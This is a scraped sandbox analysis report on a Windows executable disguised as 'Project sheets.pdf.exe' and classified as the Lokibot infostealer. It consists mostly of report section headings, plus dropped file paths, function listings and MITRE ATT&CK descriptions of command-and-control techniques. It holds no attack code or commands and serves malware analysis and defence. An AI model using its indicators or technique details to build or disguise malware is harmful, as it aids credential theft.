Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Project sheets.pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Lokibot

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Project sheets.pdf.exe.log

C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Snort IDS Alerts

Windows Analysis Report
Project sheets.pdf.exe

Function 017F4030 Relevance: 4.1, Strings: 3, Instructions: 342
COMMON

Function 017F40D8 Relevance: 4.0, Strings: 3, Instructions: 284
COMMON

Function 017F40C8 Relevance: 4.0, Strings: 3, Instructions: 280
COMMON

Function 017F9929 Relevance: 1.7, Strings: 1, Instructions: 447
COMMON

Function 017FC1B4 Relevance: 1.7, APIs: 1, Instructions: 237
processCOMMON

Function 017FC1C0 Relevance: 1.7, APIs: 1, Instructions: 236
processCOMMON

Function 017FC8F8 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Function 017FC8F4 Relevance: 1.6, APIs: 1, Instructions: 110
injectionCOMMON

Function 017FC70F Relevance: 1.6, APIs: 1, Instructions: 107
memoryCOMMON

Function 017FC600 Relevance: 1.6, APIs: 1, Instructions: 102
COMMON

Function 017FC608 Relevance: 1.6, APIs: 1, Instructions: 100
COMMON

Function 017FC761 Relevance: 1.6, APIs: 1, Instructions: 96
memoryCOMMON

Function 017FC768 Relevance: 1.6, APIs: 1, Instructions: 95
memoryCOMMON

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre